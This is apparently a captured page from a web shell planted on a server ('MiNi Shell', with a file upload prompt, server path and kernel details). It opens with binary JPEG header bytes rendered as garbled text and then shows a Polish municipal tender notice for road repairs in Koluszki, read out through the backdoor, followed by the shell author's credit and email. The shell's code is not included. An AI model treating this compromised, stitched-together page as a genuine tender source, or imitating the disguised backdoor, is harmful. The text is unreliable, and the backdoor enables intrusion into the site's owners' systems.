JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160216/33834-N-2016.html

<p class="kh_header"><b>Koluszki: Bieżące remonty nawierzchni i utrzymanie dróg: powiatowych, gminnych oraz wewnętrznych położonych na terenie administracyjnym Gminy Koluszki</b><br>
<b>Numer ogłoszenia: 33834 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące remonty nawierzchni i utrzymanie dróg: powiatowych, gminnych oraz wewnętrznych położonych na terenie administracyjnym Gminy Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Przedmiotem  niniejszego  zamówienia   jest  wykonanie  robót  związanych
z bieżącymi  remontami  oraz utrzymaniem  nawierzchni na drogach: powiatowych,  gminnych  i  wewnętrznych  położonych  na  terenie Gminy Koluszki.
2) Długość  poszczególnych  dróg położonych na  terenie  Gminy Koluszki wynosi:
a) powiatowych  ok. 42,5 km,
b) gminnych   ok. 130 km,
c) wewnętrznych  ok. 120 km.

Szczegółowy zakres prac obejmuje:
1) Wycinkę i remont  cząstkowy nawierzchni asfaltowych masą mineralno - bitumiczną  przy głębokości ubytku średnio 6 cm,
2) Remont  cząstkowy nawierzchni asfaltowych masą asfaltu na zimno,
3) Remont cząstkowy nawierzchni asfaltowych przy użyciu mas asfaltu lanego
z  wycinką miejsc uszkodzonych,
4) Remont cząstkowy nawierzchni  bitumicznych  emulsją i  grysami za pomocą  remontera typu PATCHER,
5) Remont cząstkowy nawierzchni  tłuczniowych  przy  użyciu  kruszywa  łamanego,
6) Zalanie szczelin, pęknięć  dylatacji  w nawierzchni  bitumicznej  i betonowej asfaltem na gorąco,
7) Interwencyjne zabezpieczenie w ciągu 2 godzin od zgłoszenia ubytku  w  drodze, ulicy stanowiące bezpośrednie zagrożenie dla ruchu kołowego poprzez: uzupełnienie nawierzchni  utwardzonej masą na zimno, a nieutwardzonej tłuczniem  kamiennym, 
8) Cięcie piłą nawierzchni bitumicznej  o grubości  5 -15 cm,
9) Frezowanie  nawierzchni  bitumicznej  grubości  5 - 10 cm frezarką  drogową. Materiał z rozbiórki własnością Zamawiającego. Załadunek i odwóz destruktu na odległość do10 km,
10) Wykonanie warstwy  wyrównawczej z masy mineralno- bitumicznej o grubości 
od 1 cm - do 2 cm,
11) Wykonanie  skropienia nawierzchni drogowej  asfaltem oraz nawierzchni z mieszanek  mineralno - bitumicznych warstwa  ścieralna o grubości 5 cm. Nawierzchnia  dla  ruchu  KR-2,
12) Powierzchniowe  utrwalenie  nawierzchni  drogowych  emulsją  asfaltową i  grysem kamiennym,
13) Wykonanie  korytowania, warstwy odsączającej  o grubości 10 cm - 20 cm, podbudowy z tłucznia kamiennego ( dolomit lub inna skała twarda) i wywozem  urobku  na odległość do 6 km,
14) Wymianę lub naprawę  elementów ulic lub nawierzchni  drogowych: 
a) wymianę krawężników  betonowych (15 cm x 30 cm x 100 cm lub  20 cm x 30 cm x 100 cm ) na  ławie betonowej z oporem,
b) wymianę  obrzeży chodnikowych  ( 8 cm x 30 cm x 100 cm)  na  podsypce cementowo - piaskowej w  stosunku 1:3,
c) wymianę  nawierzchni  płyt YOMB  o wymiarach  ( 75 cm x100 cm x12,5 cm)  lub ( 100 cm  x175 cm x 12,5 cm ) wraz z korytowaniem. Spoiny  wypełnione piaskiem. Materiał Wykonawcy. 
d) układanie  używanych lub nowych  płyt  YOMB - z materiału powierzonego lub Wykonawcy,  
e) układanie  używanych  płyt drogowych  typu  MON ( 300 cm x 100 cm), (300 cm x 150 cm) - z materiału  powierzonego.
15) Montaż korytek ściekowych
16) Wykonanie  poboczy z destruktu grubości 15 cm po uwałowaniu przy użyciu rozkładarki do poboczy,
17) Wykonanie poboczy z klińca  kamiennego o grubości 15 cm po uwałowaniu przy użyciu  rozkładarki do poboczy,
18) Korytowanie poboczy o szerokości od 0,5 do 1,5 m i  głębokości 20 cm  z wykonaniem  podsypki piaskowej  gr.10 cm, 
19) Wykonanie  nawierzchni  brukowej  na skarpie.  
20) Montaż  w  nawierzchni bitumicznej odwodnienia liniowego,
21) Remont studni rewizyjnej  ? 1200 mm  o  głębokości do 3,5 m,
22) Remont przykanalika  kanalizacji deszczowej wraz z wpustem deszczowym,  
23) Regulacja pionowa studzienek kanalizacyjnych,  wpustów  deszczowych,  studni   telefonicznych,  skrzynek  wodociągowych,
24) Wymiana  uszkodzonych studzienek  kanalizacyjnych,  wpustów  deszczowych, skrzynek wodociągowych,
25)  Remonty  cząstkowe  chodnika z płyt betonowych ( 50 cm x 50 cm x 7 cm )  wibroprasowanych na podsypce piaskowej  ze spoinami  wypełnionymi  piaskiem,
26) Remonty cząstkowe nawierzchni  z kostki brukowej gr. 6 cm i gr. 8 cm na  podsypce  piaskowo -cementowej  w  stosunku  3:1 ze spoinami wypełnionymi piaskiem,
27) Udrożnienie rowów przy  grubości  namułu  do 10 cm wraz  z wywozem urobku,
28) Pogłębienie  rowów z profilowaniem  skarp,  grubości  namułu  do  30 cm z  wywozem urobku,
29) Kopanie  rowów  odwadniających,  trapezowych,
30) Wykonanie  przepustów z PEHD  wraz z rozbiórką starego i ich wywozem gruzu,
31) Udrożnienie  i  czyszczenie  przepustów  rurowych, DN 400 mm - DN 800 mm
32) Wykonanie  murków  oporowych dla  przepustów  drogowych,
33) Karczowanie krzaków w poboczach drogi i rowie,
34) Wykaszanie rowów i poboczy dróg,
35) Profilowanie  dróg  równiarką  drogową  o mocy  minimum  100 KM,
36) Ścinka  poboczy do szer. 1,50 m
37) Czyszczenie studni chłonnych  i osadników  o głębokości do 6 m, z  wypompowaniem  wody  wraz  z  2  przykanalikami  i 2  kratkami  ściekowymi,
38) Czyszczenie wpustów deszczowych  z przykanalikiem,
39) Zamiatanie  nawierzchni  bitumicznych  ulic z : piachu,  soli,  błota i  wszelkich  innych  nieczystości  komunalnych  wraz  z wywiezieniem  ich  na  wysypisko,
40) Zakup i montaż barier łańcuchowych ze słupkami  stalowymi do  wys. 1,10 m o rozstawie  co 2 m,
41) Transport, załadunek  i  rozładunek  materiałów  budowlanych  sypkich i sztukowych,
42) Kruszenie gruzu, betonu wraz z załadunkiem i  hałdowaniem.
43) Sporządzenie projektu stałej  organizacji ruchu,
44) Usuwanie wód  opadowych  z  dróg, ulic utwardzonych.
45) Wykonywanie robót koparką podsiębierną,
46) Wykonywanie robót walcem  drogowym minimum  9 ton  posiadającym wibrację,
47) Wycięcie  i usunięcie drzewa o średnicy do 200 cm znajdującego się w pasie drogowym,
48) Karczowanie lub frezowanie pnia drzewa.
Szczegółowe ilości  prac będących przedmiotem niniejszego przetargu ujęte są
w załącznikach nr 2 A ( drogi  gminne  i wewnętrzne) oraz 2 B ( drogi powiatowe) do Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6, 45.23.32.22-1, 45.23.32.23-8, 45.23.24.51-8, 45.23.32.80-5, 90.61.10.00-3, 45.11.27.00-2, 90.00.00.00-7, 90.21.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 40.000,00 zł  słownie: czterdzieści tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie  podpisanych  oświadczeń  o  spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1  i 24 Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca załączy aktualny  odpis  
z właściwego rejestru, jeżeli  odrębne przepisy  wymagają wpisu do rejestru  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje,  
czy Wykonawca spełnia, czy nie spełnia warunki udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenia  o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1  Ustawy Prawo Zamówień  Publicznych, oraz gdy Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy -w tym okresie wykonał minimum po dwie realizacje polegające na: 
a) wykonaniu  nawierzchni  bitumicznych  dróg  o powierzchni  minimum  5.000 m2   
( słownie:pięć tysięcy metrów kwadratowych) -Przy ocenie spełnienia warunku brane  będą tylko realizację powyżej 5.000 m2.
b) powierzchniowym utrwaleniu nawierzchni emulsją  i grysami o powierzchni minimum : 1.000 m 2 ( słownie: jeden tysiąc metrów kwadratowych ).
Przy ocenie  spełnienia warunku  brane  będą  tylko realizację  powyżej 1.000  m2. 
c) remontach cząstkowych nawierzchni  bitumicznych  powyżej: 100  Mg ( słownie: sto ton)  wbudowanej  masy bitumicznej na każdej realizacji. 
Przy  ocenie  spełnienia warunku brane będą tylko realizację powyżej 100  ton ( każda  realizacja). 
Należy podać zakres prac, wartość oraz datę i miejsce wykonania wraz z załączeniem  dokumentów potwierdzających, że roboty te zostały wykonane z zasadami sztuki  budowlanej  i prawidłowo ukończone.   
Podane ilości prac opisanych w punktach: a)  b) c)  Wykonawca  mógł  zrealizować  na różnych zadaniach. 
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje,  
czy Wykonawca spełnia, czy nie spełnia warunki udziału w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony na  podstawie podpisanego oświadczenia o spełnieniu  warunków udziału w postępowaniu o których mowa  w art. 22 ust.1 Ustawy  Prawo  Zamówień  Publicznych oraz, gdy Wykonawca dysponuje osobą, która  będzie uczestniczyć w wykonaniu zamówienia, a w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi i osoba ta będzie posiadała uprawnienia budowlane do kierowania robotami w specjalności drogowej zgodnie z art.12 a ustawy z dnia 7 lipca 1994 r. Prawo  budowlane ( Dz.U. z 2010 r. Nr 243  poz.1623 z późniejszymi zmianami ).
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje,  czy  Wykonawca spełnia, czy nie spełnia warunki udziału w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na  podstawie podpisanego oświadczenia  o spełnieniu warunków udziału w  postępowaniu o których mowa  w  art. 22 ust.1 Ustawy  Prawo  Zamówień  Publicznych  oraz, gdy Wykonawca  dysponuje osobą, która  będzie  uczestniczyć  w wykonaniu zamówienia, a w szczególności będzie odpowiedzialna za kierowanie  robotami  budowlanymi  i osoba ta będzie posiadała uprawnienia budowlane  do  kierowania robotami w specjalności drogowej zgodnie z art.12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami).
Na podstawie załączonych  dokumentów i oświadczeń Zamawiający zweryfikuje,  
czy Wykonawca spełnia, czy nie spełnia warunki udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego  oświadczenia  
o spełnieniu warunków udziału w postępowaniu, o których mowa  w  art. 22 ust. 1 Ustawy  Prawo Zamówień Publicznych. 
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje,  
czy Wykonawca spełnia, czy nie spełnia warunki udziału w  postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty (załącznik nr 1 do Specyfikacji Istotnych Warunków  Zamówienia),
2) Wypełnione formularze cen jednostkowych (załączniki nr 2A i 2B do Specyfikacji  Istotnych Warunków Zamówienia),
3) W przypadku, gdy Wykonawca  będzie korzystał z wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do  wykonania  zamówienia  innych podmiotów,  zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania  zamówienia.
4) W przypadku, gdy podmioty występują wspólnie  wykonawcy powinni ustanowić  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia,  albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Wydłużenie okresu gwarancji i rękojmi - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
a) w uzasadnionych przypadkach, a w szczególności, gdy zajdzie: konieczność dokonania  zmian  w  projekcie  budowlanym, przekroczenia terminów  wydawania przez organy administracji: decyzji i zezwoleń  itp., wystąpienia znalezisk archeologicznych, wyjątkowo  niesprzyjających  warunków  atmosferycznych, geologicznych, hydrologicznych,  nieprzewidzianych kolizji  z urządzeniami infrastruktury, w  przypadku działania siły wyższej w rozumieniu przepisów Kodeksu Cywilnego;  lub  w innych okolicznościach  niezależnych  od  Zamawiającego  lub  Wykonawcy, kiedy  konieczna  będzie  zmiana  terminu  realizacji  zamówienia, Zamawiający na  pisemny  wniosek  Wykonawcy  może  przedłużyć  termin  realizacji  zamówienia,
b) w  innych  uzasadnionych  przypadkach, gdy zajdzie konieczność  wprowadzenia  do  umowy koniecznych  zmian  wynikających  z okoliczności,  których nie  można  było  przewidzieć  w chwili zawarcia  umowy, Zamawiający za  zgodą  Wykonawcy  może dokonać  takiej  zmiany.
c) w przypadku, gdy zmiany postanowień zawartej umowy będą  korzystne dla Zamawiającego, a  zmiany  te wynikły  w  trakcie  realizacji zamówienia, Zamawiający  za zgodą  Wykonawcy może dokonać  takiej zmiany.
d) w przypadku, gdy zajdzie uzasadniona konieczność ograniczenia, lub rezygnacji 
z  części  umownego  zakresu  robót, Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia  umownego  poprzez korektę  wartości  ryczałtowej  przedmiotu umowy  po  cenach  i stawkach  wynikających  z kosztorysu ofertowego  Wykonawcy,
e) w przypadku, gdy zajdzie uzasadniona konieczność wykonania  robót zamiennych  mających  służyć  właściwej  realizacji zamówienia, Zamawiający zastrzega sobie możliwość zmiany umówionego  wynagrodzenia wynikającego  z porównania  rozmiaru i wartości  robót zamiennych  z robotami  przewidzianymi do  realizacji  w dokumentacji  projektowej i zawartej umowie z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę umówionego wynagrodzenia.  
W  przypadku wystąpienia robót  dodatkowych  lub uzupełniających  nieobjętych  niniejszym zamówieniem, niezbędnym do prawidłowego wykonania umowy, roboty te zostaną rozliczone zostaną w oparciu o ceny i wskaźniki cenotwórcze zaproponowane przez wykonawcę w kosztorysie szczegółowym. Zlecenie  wykonania robót  dodatkowych lub uzupełniających dokonane  zostanie w  oparciu o odrębną umowę.  
f) w przypadku ustawowej  zmiany stawki podatku od towarów i usług ( VAT) cena netto pozostanie bez zmian, a  kwota podatku VAT i wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie z aktualnie obowiązującymi  przepisami  podatkowymi.
2)W razie zaistnienia zmiany okoliczności powodującej,  że wykonanie  umowy nie  leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od dnia  powzięcia wiadomości  o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul. 11 Listopada 65 pok nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2016 godzina 09:30, miejsce: kancelaria  Urzędu Miejskiego w Koluszkach przy ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com